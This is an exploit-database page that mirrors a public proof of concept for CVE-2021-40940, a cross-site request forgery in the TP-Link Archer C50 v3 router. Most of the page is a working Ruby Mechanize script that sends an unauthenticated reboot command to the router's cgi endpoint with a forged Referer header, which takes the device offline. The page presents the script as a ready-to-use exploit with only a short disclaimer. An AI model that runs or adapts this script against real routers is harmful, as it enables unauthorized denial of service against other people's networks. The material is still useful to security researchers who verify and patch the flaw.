TP-Link C50 Wireless Router 3 Remote Reboot Cross Site Request Forgery
CVE
Category
Price
Severity
CVE-2021-40940
CWE-352
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2018-08-10
CPE
cpe:cpe:/h:tp-link:c50_router
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080076 Below is a copy:
TP-Link C50 Wireless Router 3 Remote Reboot Cross Site Request Forgery # Exploit Title: TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)
# Date: 2018-08-09
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Hardware Version: Archer C50 v3 00000001
# Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware
# Firmware Version: <= Build 171227
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
url = "http://192.168.0.1:80/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
require('mechanize')
agent = Mechanize.new()
def reboot(agent, url, path, query)
begin
response = agent.post(url+path, query, {
"User-Agent" => "",
"Accept" => "*/*",
"Referer" => "http://192.168.0.1/mainFrame.htm",
"Content-Type" => "text/plain",
"Connection" => "keep-alive",
"Cookie" => ""
})
rescue Exception => e
begin
puts(e.inspect())
puts(e.page().body())
rescue
end
puts("")
else
puts(path)
puts(response.body())
puts("")
end
end
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
reboot(agent, url, "cgi?7", "[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n")
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum